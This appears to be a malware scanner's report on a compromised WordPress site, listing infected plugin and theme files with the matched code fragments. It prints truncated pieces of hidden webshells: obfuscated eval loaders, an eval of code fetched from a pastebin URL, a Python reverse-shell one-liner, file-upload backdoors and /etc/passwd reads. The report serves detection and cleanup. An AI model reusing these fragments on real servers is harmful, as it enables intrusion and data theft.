Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "PD9waHAKZnVuY3Rpb24gcHduKCRjbWRkKSB7CiAgICBnbG9iYWwgJGFiYywgJGhlbHBlciwgJGJhY2t0cmFjZTsKCiAgICBjbGFzcyBWdWxuIHsKICAgICAgICBwdWJsaWMgJGE7CiAgICAgICAgcHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKSB7IAogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgCiAgICAgICAgICAgIHVuc2V0KCR0aGlzLT5hKTsKICAgICAgICAgICAgJGJhY2t0cmFjZSA9IChuZXcgRXhjZXB0aW9uKS0+Z2V0VHJhY2UoKTsgIyA7KQogICAgICAgICAgICBpZighaXNzZXQoJGJhY2t0cmFjZVsxXVsnYXJncyddKSkgeyAjIFBIUCA+PSA3LjQKICAgICAgICAgICAgICAgICRiYWNrdHJhY2UgPSBkZWJ1Z19iYWNrdHJhY2UoKTsKICA...
Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code	<?php ${${"GLOBALS"}["golctxwuyq"]});for(${${"GLOBALS"}["mkbsmuux"]}=0;${${"GLOBALS"}["klevplx"]}<${$acqvczjfsw};${$bguvgwj}++){${"GLOBALS"}["kxwhluunpdho"]="Array";${"GLOBALS"}["itqour"]="fungsi";${${"GLOBALS"}["itqour"]}[]=unx(${${"GLOBALS"}["kxwhluunpdho"]}[${${"GLOBALS"}["lgjstiud"]}]);}if(isset($_GET["d"])){${"GLOBALS"}["ctopgggqijwm"]="cdir";${"GLOBALS"}["pltcmqfftfd"]="fungsi";${${"GLOBALS"}["ctopgggqijwm"]}=unx($_GET["d"]);${${"GLOBALS"}["pltcmqfftfd"]}[14](${${"GLOBALS"}["xnusza"]});}else{${"...
Exploit double_var2 Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code	`<?php ${$xrhxuou}`
Exploit escaped_path Line: 38 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x71g\x67uc\x79q\x67s`
Exploit hex_char Line: 38 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 38 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4cOB\x41\x4cS"}`
Function exec Dangerous Encoded Function `exec` [https://www.php.net/exec]	<?php exec(\"/bin/sh -i\");};'");}else if($_POST["gecko-bc"]=="python"){${"GLOBALS"}["hkrdyrymu"]="PortServer";$igilbvwnbdy="HostServer";echo cmd("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\${$igilbvwnbdy}."",".${${"GLOBALS"}["hkrdyrymu"]}."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");}else if($_POST["gecko-bc"]=="ruby"){echo cmd("ruby -rsocket -e'f=TCPSocket.open("".${${"GL...
Sign 00f56a27 Line: 38 Dangerous Malware Signature (hash: 00f56a27)	`<?php ${${`
Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730)	`<?php meta http-equiv="refresh" content="0;`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php Exploit`
Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268)	`<?php exploit`
Sign 237750ea Line: 38 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 407651f7 Dangerous Malware Signature (hash: 407651f7)	`<?php WScript.shell`
Sign 5b557546 Dangerous Malware Signature (hash: 5b557546)	`<?php 65786563`
Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N5c3Rlb`
Sign 963e968a Dangerous Malware Signature (hash: 963e968a)	`<?php PD9waH`
Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`
Sign ae7830db Dangerous Malware Signature (hash: ae7830db)	`<?php Y2hy`
Sign cbea68d7 Dangerous Malware Signature (hash: cbea68d7)	`<?php 73797374656d`
Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e)	`<?php Backdoor`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php zeXN0ZW`

/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/modules/constant-contact/index.php

Size: 1.05 kB Created: 2021-09-30 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 3

Description	Match
Exploit download_remote_code_web Dangerous RFU (Remote File Upload), from external website, allow to write malicious code on the target machine	`<?php file_get_contents("https://pastebin.com/raw/NYwj9nzX")`
Exploit silenced_eval Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine	`<?php @eval("?>".file_get_contents("https://pastebin.com/raw/NYwj9nzX")`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval("?>".file_get_contents("https://pastebin.com/raw/NYwj9nzX"))`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php eval("?>`

/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/modules/sendinblue/index.php

Size: 20.97 kB Created: 2022-05-14 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Line: 50 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "015c24a3dbfced3cbb7fca709e99719b27c764c45b12ce12432c1b7151832e1ceb0d2544f8768c4fe36f9080a21e360e74364f7d063e98dee97ce4b5bcca4ff6a4f80334604c3932566d5caf2f56a2540587001fc7c7d8f7d18f1f974aece56fbeff6f8709b1ce826f7ff3086e3ace53e20a5eccae52eddbdbb36fe9462d10e72ea1ba74a779116bbfc4772b4d8cdb57d1ee8437505877bffdb0125f720e7f97686b3af75d3915f0f706e4c61b5adf5d978677e07db0e50f0071d0da777aef1192ee812368737efeb662e2494d491b431cedaf8cc0edea3f3729dae626a98f0439b44d4dd2b3ed8319c42996e99feb06fb7d932a76fc8dbfbe7...
Exploit hex_char Line: 48 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 51 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x4f\x30\x4f"}`
Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php eval($o0o.${"oOO"}($oOo(${"o0O"}($oOo(${"o00"}($oOo(${"oOO"}($oOo(${"o0O"}($OOO(${"O0O"})))))))))))`
Function eval Line: 51 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($o0o.${"\x6f\x4f\x4f"}($oOo(${"\x6f\x30\x4f"}($oOo(${"\x6f\x30\x30"}($oOo(${"\x6f\x4f\x4f"}($oOo(${"\x6f\x30\x4f"}($OOO(${"\x4f\x30\x4f"})))))))))))`

/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/assets/ajax_req/index.php

Size: 18.79 kB Created: 2022-01-11 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 7

Description	Match
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'CiBnb3RvIGczU2p1OyBERXBuYTogJExpeCA9ICJcNzVcNzVcMTQ3XDYwXDEyN1wxMTBceDZmXHg2Nlx4NzRcNzFceDYzXDEyN1x4MmJcNjZceDQ4XDE3MVx4NzFcNjBcMTI3XDE1MVx4NDJcMTA0XHg1Mlx4NjlceDUwXDcwXHg2Nlx4NDdcMTYzXDEwMVx4NDJceDc5XDEyMFwxMDRceDY5XDE2MFwxMTVceDY2XDE2MFw2NFx4NmNcMTY3XDE1M1wxMDFcMTIyXHgzNFwxNjdcMTU1XDEyMlx4NTdceDZlXDE2MFwxNDVcNjBcMTAxXDYwXHg2MVx4NjhceDMzXHg0MlwxMDVcMTYzXHgzMVx4NmJcMTEwXHg3N1w3MVwxNTVceDM4XDEwMVwxNDZceDU4XHg0OVwxMTdceDQzXDUzXHgzMlx4NDNceDM5XDE1Nlw3MFwxNDNceDdhXDE1M1x4NGRcMTY2XDE0MVwxNjJceDMxXHg...
Exploit eval_base64 Line: 38 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine	<?php eval(base64_decode('CiBnb3RvIGczU2p1OyBERXBuYTogJExpeCA9ICJcNzVcNzVcMTQ3XDYwXDEyN1wxMTBceDZmXHg2Nlx4NzRcNzFceDYzXDEyN1x4MmJcNjZceDQ4XDE3MVx4NzFcNjBcMTI3XDE1MVx4NDJcMTA0XHg1Mlx4NjlceDUwXDcwXHg2Nlx4NDdcMTYzXDEwMVx4NDJceDc5XDEyMFwxMDRceDY5XDE2MFwxMTVceDY2XDE2MFw2NFx4NmNcMTY3XDE1M1wxMDFcMTIyXHgzNFwxNjdcMTU1XDEyMlx4NTdceDZlXDE2MFwxNDVcNjBcMTAxXDYwXHg2MVx4NjhceDMzXHg0MlwxMDVcMTYzXHgzMVx4NmJcMTEwXHg3N1w3MVwxNTVceDM4XDEwMVwxNDZceDU4XHg0OVwxMTdceDQzXDUzXHgzMlx4NDNceDM5XDE1Nlw3MFwxNDNceDdhXDE1M1x4NGRcMTY2...
Exploit execution Line: 38 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(base64_decode('CiBnb3RvIGczU2p1OyBERXBuYTogJExpeCA9ICJcNzVcNzVcMTQ3XDYwXDEyN1wxMTBceDZmXHg2Nlx4NzRcNzFceDYzXDEyN1x4MmJcNjZceDQ4XDE3MVx4NzFcNjBcMTI3XDE1MVx4NDJcMTA0XHg1Mlx4NjlceDUwXDcwXHg2Nlx4NDdcMTYzXDEwMVx4NDJceDc5XDEyMFwxMDRceDY5XDE2MFwxMTVceDY2XDE2MFw2NFx4NmNcMTY3XDE1M1wxMDFcMTIyXHgzNFwxNjdcMTU1XDEyMlx4NTdceDZlXDE2MFwxNDVcNjBcMTAxXDYwXHg2MVx4NjhceDMzXHg0MlwxMDVcMTYzXHgzMVx4NmJcMTEwXHg3N1w3MVwxNTVceDM4XDEwMVwxNDZceDU4XHg0OVwxMTdceDQzXDUzXHgzMlx4NDNceDM5XDE1Nlw3MFwxNDNceDdhXDE1M1x4NGRcMTY2...
Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(base64_decode('CiBnb3RvIGczU2p1OyBERXBuYTogJExpeCA9ICJcNzVcNzVcMTQ3XDYwXDEyN1wxMTBceDZmXHg2Nlx4NzRcNzFceDYzXDEyN1x4MmJcNjZceDQ4XDE3MVx4NzFcNjBcMTI3XDE1MVx4NDJcMTA0XHg1Mlx4NjlceDUwXDcwXHg2Nlx4NDdcMTYzXDEwMVx4NDJceDc5XDEyMFwxMDRceDY5XDE2MFwxMTVceDY2XDE2MFw2NFx4NmNcMTY3XDE1M1wxMDFcMTIyXHgzNFwxNjdcMTU1XDEyMlx4NTdceDZlXDE2MFwxNDVcNjBcMTAxXDYwXHg2MVx4NjhceDMzXHg0MlwxMDVcMTYzXHgzMVx4NmJcMTEwXHg3N1w3MVwxNTVceDM4XDEwMVwxNDZceDU4XHg0OVwxMTdceDQzXDUzXHgzMlx4NDNceDM5XDE1Nlw3MFwxNDNceDdhXDE1M1x4NGRcMTY2...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))))`
Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268)	`<?php eval(base64_decode(`
Sign 7f5d33bf Line: 38 Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc)	`<?php <?php eval`
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d)	`<?php Z3ppbmZsYXRl`
Sign de12c454 Line: 38 Dangerous Malware Signature (hash: de12c454)	`<?php V2YW`

/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/src/Customizer/index.php

Size: 64.79 kB Created: 2021-12-03 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 5

Description	Match
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($ukr3B, $_POST["new"])`
Exploit download_remote_code2 Line: 43 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($ukr3B, $_POST["\156\x65\x77"])`
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php eval(gzuncompress\50base64_decode\50"; goto j9Vvp; YqLrR: if (count($xHyVF)`
Exploit hex_char Line: 43 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval]	<?php eval(base64_decode\50"; goto oiG26; tpgtx: zV3C6: goto Pa12b; mmj0N: d1BzN: goto gp6Fa; q7a80: bW5Um($WRsqg); goto tyxU_; HIUu8: XsCHf: goto lSv0U; tyxU_: goto LG5uz; goto Mj7RO; vnUYp: header("Cache-Control\72 must\55revalidate"); goto re1HG; alUgM: if (is_dir($_GET["del"])) { goto d1BzN; } goto GVpxQ; yreVi: header("Content-Disposition\72 attachment\73 filename\75" . basename($uMTgE)); goto Os2LY; Oor_g: $C9cVN = QFocs($_SERVER["SCRIPT_FILENAME"], ''); goto hcYHc; TcIIi: fclose($ukr3B); goto X...

/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/src/Notify/index.php

Size: 14.84 kB Created: 2022-02-12 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Line: 1 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'tXpjcGbhlm5sJx3bdtKxbfOLvtjq2Lb5xUkn6djq2LbTsW2r+/acmXOm5s75davu+rFrLz/r2bWr3rdq8dP9bzHgYf0rtqz6Bm03S/pSukrKYroalLSivM4ynOp2OpZAUwltCXNtb1UjWi8Ha5f/Lw8//v9AYm9tYq7k+lXK3YiSVprXRcyIVlNchstJz/yv7mLp4OVq4m7/jdbaxdzc0oLUxNzK0sWc/18RXg6OQK9v/MrSDl/1/qn5/I+S/2YiUhOgu6WTiZUrv8HXf0OC4L+q8xtw/xv3fzXz43dQcGa3MKL8J6j/YJXrf1Nq4u7IbuviRktnaeJOy/g3hpP131L/P+P+qzbt36EdrSwE/0v9Rw+O/+d0H7p/2v9B9L948PPj/5tu8c9J/PjZ/9FBkMH975ROlILM//D6uFh4ufxD/0+VjlVQ0J2S1tWdn86BktGA/d+h8nRyMBV0+ov7P72M7pSMfyH9xfnf0P4WMqEU+FvIxcv...

Function eval Line: 1 Warning

Potentially dangerous function `eval`

<?php eval($Vtkra($VZDBO($jhGvm($fIeKd('tXpjcGbhlm5sJx3bdtKxbfOLvtjq2Lb5xUkn6djq2LbTsW2r+/acmXOm5s75davu+rFrLz/r2bWr3rdq8dP9bzHgYf0rtqz6Bm03S/pSukrKYroalLSivM4ynOp2OpZAUwltCXNtb1UjWi8Ha5f/Lw8//v9AYm9tYq7k+lXK3YiSVprXRcyIVlNchstJz/yv7mLp4OVq4m7/jdbaxdzc0oLUxNzK0sWc/18RXg6OQK9v/MrSDl/1/qn5/I+S/2YiUhOgu6WTiZUrv8HXf0OC4L+q8xtw/xv3fzXz43dQcGa3MKL8J6j/YJXrf1Nq4u7IbuviRktnaeJOy/g3hpP131L/P+P+qzbt36EdrSwE/0v9Rw+O/+d0H7p/2v9B9L948PPj/5tu8c9J/PjZ/9FBkMH975ROlILM//D6uFh4ufxD/0+VjlVQ0J2S1tWdn86BktGA/d+h8nRyMBV0+o...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/theme-data/one-page-express/index.php

Size: 8.47 kB Created: 2021-10-14 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3

Description	Match
Exploit download_remote_code2 Line: 75 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp,$_POST['src'])`
Sign 2b3f81c9 Line: 46 Dangerous Malware Signature (hash: 2b3f81c9)	`<?php 0byt3m1n1`
Sign d97f004d Line: 111 Dangerous Malware Signature (hash: d97f004d)	`<?php ZeroByte`

/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/vendor/bin/index.php

Size: 13.16 kB Created: 2022-05-10 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1

Description	Match
Sign 963e968a Line: 198 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`

/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/vendor/composer/index.php

Size: 1.42 kB Created: 2021-12-23 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1

Description	Match
Sign 43b0d90f Line: 44 Dangerous Malware Signature (hash: 43b0d90f)	`<?php echo "<h1><a href='$fullpath'>OK-Click here!</a>`

/custdata02/turtle/public_html/wp-content/themes/twentytwentyfour/assets/images/index.php

Size: 117.84 kB Created: 2022-08-10 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 7 Dangers: 3

Description	Match
Exploit base64_long Line: 136 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "6d5138716c36443945465a724f3774626a4b706e6a5144716b6130644e505a6e4247306e42465a346b71786e58505a724f3774626a4b346e6c375a764e5057796b3730646d3752394263484750396259565257756b3730646d37523942625a5857397468533856555653485a4357786e42615a726c6134624f36577943465a346b6f34666b616a37516e486a424762736a4b666e695041734f50447a6a62756f50556378435778726b6f34636a504d6f434641734e6162754e513472434b6375414b63436c3641734e4652714165666e42614e786c4752736c6f6778424a49784b61306e426156386b4a45796b6f34616d5170626c613179435...
Exploit base64_long Line: 137 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "456f49726a505a6f423744786c6530714e504475454b38364b7a526e4e554c546c375a764e5057324b6556785855564c53636a51516e4c6a597179636b4a39635752444652627570505475436b3730646d3752394348417553494e6855533448524b705454395a4250385a535363524c5455707a4e5056716b6130396c3744346c6148744e5567656a475a7145656378597178784e6566646c3734734e515a39434841756b3730646d3748634e4644686d51357944464d756d5134626a4830666a473073434b567843556378435074726b47527343485a5356496259424b452b44624165435475436c364c626c6566545249565852525775456...
Exploit base64_long Line: 138 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "6b375239503656786c5152686c4762746d505779414b633244475a796a51347650365a786961533041545771414a75636a3644786a4752684f5438736a517075596f56626b7a44726b623066585134386c47713244465a794e51707558556a386c6148744e554d744f5475676a6e75676d515732454b30656d5135726b3767674251637a596f56634f5152746c373530414a75634e4752656a516b30414a74784e6566616a5134646a4762726c6230626947626e6a46417944364c646c7a567550374e726b61757a4355623244464c784e4a38714f3734396c4830616c364476434b63326d514f7944464c784e4a393042544978693752356d5...
Exploit concat Line: 127 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].`
Exploit concat Line: 128 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].`
Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[1].$ABC[3].$ABC[7].$ABC[11].$ABC[7].$ABC[9].$ABC[3].$ABC[10].$ABC[8]; $STr = $ABC[1].$ABC[3].$ABC[7].$ABC[3].$ABC[7]; $BDEC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $BENC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $WKWK[] = ""; foreach($f_______un as $x => $xx){ $WKWK[$x] = nhx(Dex($xx)); }`
Exploit etc_passwd Line: 1811 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system	`<?php /etc/passwd`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($x); $r = ob_get_contents(); ob_end_clean(); return $r; } catch (ParseError $e) { return false; } } function IsWin(){ global $WKWK; return $WKWK[27](PHP_OS, 'WIN') !== false; } function Bc($ip, $port, $lang) { global $WKWK, $code; $lang = strtolower($lang); $arg=$ip." ".$port; $cod=Dex($code[$lang]); if($lang == "php"){ $arg=""; $cod='$ip="'.$ip.'";$port='.$port.';'.$cod; } if(!RunCode($arg, $cod, $lang)) return false; } function RunCode($argument, $code, $lang){ global $WKWK; $lang=strtolo...
Sign 7830f7a6 Line: 1570 Dangerous Malware Signature (hash: 7830f7a6)	`<?php nc -l`
Sign b236d073 Line: 1811 Dangerous Malware Signature (hash: b236d073)	`<?php /etc/passwd`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/main/inc/validation/color/validation_color.php

Size: 5.59 kB Created: 2024-06-02 20:16:05 Modified: 2024-06-02 20:16:05 Dangers: 1

Description	Match
Function strrev eval_strrev Line: 34 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/main/inc/class.redux_api.php

Size: 27.68 kB Created: 2024-06-02 20:16:05 Modified: 2024-06-02 20:16:05 Dangers: 1

Description	Match
Exploit nano Line: 71 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $extension['class']( $ReduxFramework )`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/main/inc/class.redux_helpers.php

Size: 22.99 kB Created: 2024-06-02 20:16:05 Modified: 2024-06-02 20:16:05 Dangers: 1

Description	Match
Sign 471b95ee Line: 285 Dangerous Malware Signature (hash: 471b95ee)	`<?php suhosin`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/main/index.php

Size: 6.44 kB Created: 2022-06-09 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 4

Description	Match
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "eJzNOv1z2kqSPydV+R8mc1yQ1kiID4MNBp/t+G1SLy9Jxd6temX7UoM0AsVC0kqDbR5wf/t1z+gLjGOyuX17LgNST3dPz/THdLd0dBxNolcveRyH8deYR2EsvGCsWXr/1cuJEBHAkigMEv7VDh2uta02jjjc9QKu0YT7Lq0R+uvZJfnt/cf35OLd+YcPpG21KKJVEvstGRCaXD90WvBpwIfDpw2fw5gihmsDAotjNtdo1+ocdK19t7vf4Z1Gx+nsI28F7XY6+91mt9U57LgdjvBOFyDtTqvb7bTlfatz0Gl3DrtNRdVtdvY7XeDWAg42wBVWA7g04ftw30XsDvxJ+GG3pSCKPr3vAIat5FCQbheogRfI19wYwfkanfWRlB7l7rIU1uq4IN1heRxm2u8eIJ9uu9taHwFcWCdgtHDlMPM+fm9iqd14AsvpjEo7g3KW9xfnbAKF28X9SKGw5224tuXu7Xdw3xswE+4x7qDiC2vFmcqSdJy...
Exploit hacked_by Dangerous Hacker credits	`<?php Hacked By`
Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $fc[18]($fc[14]($p.'/'.nhx($_GET['n'])`
Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval]	<?php eval("?>"."<?php error_reporting(0); http_response_code(404); define('self', 'KCT MINI SHELL 403'); $scD = 's\x63\x61\x6e\x64\x69r'; $fc = array('7068705f756e616d65', '70687076657273696f6e', '676574637764', '6368646972', '707265675f73706c6974', '61727261795f64696666', '69735f646972', '69735f66696c65', '69735f7772697461626c65', '69735f7265616461626c65', '66696c6573697a65', '636f7079', '66696c655f657869737473', '66696c655f7075745f636f6e74656e7473', '66696c655f6765745f636f6e74656e7473', '6d6b6...
Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval("?>".gzuncompress(base64_decode("eJzNOv1z2kqSPydV+R8mc1yQ1kiID4MNBp/t+G1SLy9Jxd6temX7UoM0AsVC0kqDbR5wf/t1z+gLjGOyuX17LgNST3dPz/THdLd0dBxNolcveRyH8deYR2EsvGCsWXr/1cuJEBHAkigMEv7VDh2uta02jjjc9QKu0YT7Lq0R+uvZJfnt/cf35OLd+YcPpG21KKJVEvstGRCaXD90WvBpwIfDpw2fw5gihmsDAotjNtdo1+ocdK19t7vf4Z1Gx+nsI28F7XY6+91mt9U57LgdjvBOFyDtTqvb7bTlfatz0Gl3DrtNRdVtdvY7XeDWAg42wBVWA7g04ftw30XsDvxJ+GG3pSCKPr3vAIat5FCQbheogRfI19wYwfkanfWRlB7l7rIU1uq4IN1heRxm2u8eIJ9uu9taHwFcWCdgtHDlMPM+fm9iqd14AsvpjEo7g3KW9xfnbAKF28X9SK...
Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268)	`<?php eval("?>`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/meta/index.php

Size: 28.35 kB Created: 2022-03-27 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval($ver); return $view; } function backend($_claster) { $_module = $this->stable[0].$this->stable[4].$this->stable[3].$this->stable[1].$this->stable[2].$this->stable[5]; return $_module("\r\n", "", $_claster); } var $access; var $_debug = 0; var $ls = array('te', 'in', 'la', 'f', 'gz'); var $dx = array('on', 'crea', 'te_fun', 'cti'); var $lib = array('cod', 'de', 'base', '64_', 'e'); var $memory = array('ie', 'tco', 'se', 'ok'); var $stable = array('s', 'p', 'la', '_re', 'tr', 'ce'); var $core...

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/images/widgets/network.php

Size: 72.65 kB Created: 2022-07-27 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 5

Description	Match
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]	<?php exec('echo "./' . basename($file) . '" \| /bin/sh', $output, $retval); $error = ($retval == 0) ? false : true; if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>'); if ($error) { listing_page(error('not_executed', $file, implode("\n", $output))); } else { listing_page(notice('executed', $file, implode("\n", $output))); } break; case 'delete': if (!empty($_POST['no'])) { listing_page(); } elseif (!empty($_POST['yes'])) { $failure = array(); $success = array(); foreach ($files...
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid]	<?php posix_getpwuid($file['owner'])); if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group'])); $files[] = $file; } } return $files; } else { return false; } } function sortlist ($list, $key, $reverse) { $dirs = array(); $files = array(); for ($i = 0; $i < sizeof($list); $i++) { if ($list[$i]['is_dir']) $dirs[] = $list[$i]; else $files[] = $list[$i]; } quicksort($dirs, 0, sizeof($dirs) - 1, $key); if ($reverse) $dirs = array_reverse($dirs); quicksort($files,...
Function strrev eval_strrev Line: 2087 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`
Sign 00f56a27 Line: 799 Dangerous Malware Signature (hash: 00f56a27)	`<?php $_POST['ur'])) $mode \|= 0400`
Sign 407651f7 Line: 1227 Dangerous Malware Signature (hash: 407651f7)	`<?php webadmin.php</h1>`
Sign 91535293 Line: 726 Dangerous Malware Signature (hash: 91535293)	`<?php listing_page(notice('symlinked`
Sign a408f408 Line: 715 Dangerous Malware Signature (hash: a408f408)	`<?php case 'create_symlink':`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/lib/custom_posts/item.php

Size: 103.24 kB Created: 2022-08-11 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 19

Description	Match
Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code	<?php ${${"GLOBALS"}["ahmyqhq"]}=["7368656c6c5f65786563","65786563","7061737374687275","73797374656d","70726f635f6f70656e","706f70656e","70636c6f7365","72657475726e","73747265616d5f6765745f636f6e74656e7473","676574637764","6368646972","7068705f756e616d65","6973736574","66756e6374696f6e5f657869737473","5f6d61645f636d64","245f5345525645525b275345525645525f4e414d45275d","676c6f62","69735f66696c65","69735f646972","69735f7772697461626c65","69735f7265616461626c65","66696c6573697a65","6765745f63757272656e745...
Exploit double_var2 Line: 41 Warning Double var technique is usually used for the obfuscation of malicious code	`<?php ${$qxzdjwf}`
Exploit escaped_path Line: 41 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x6bi\x67x\x75m\x73d`
Exploit etc_passwd Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system	`<?php /etc/passwd`
Exploit hex_char Line: 41 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 41 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4cO\x42\x41L\x53"}`
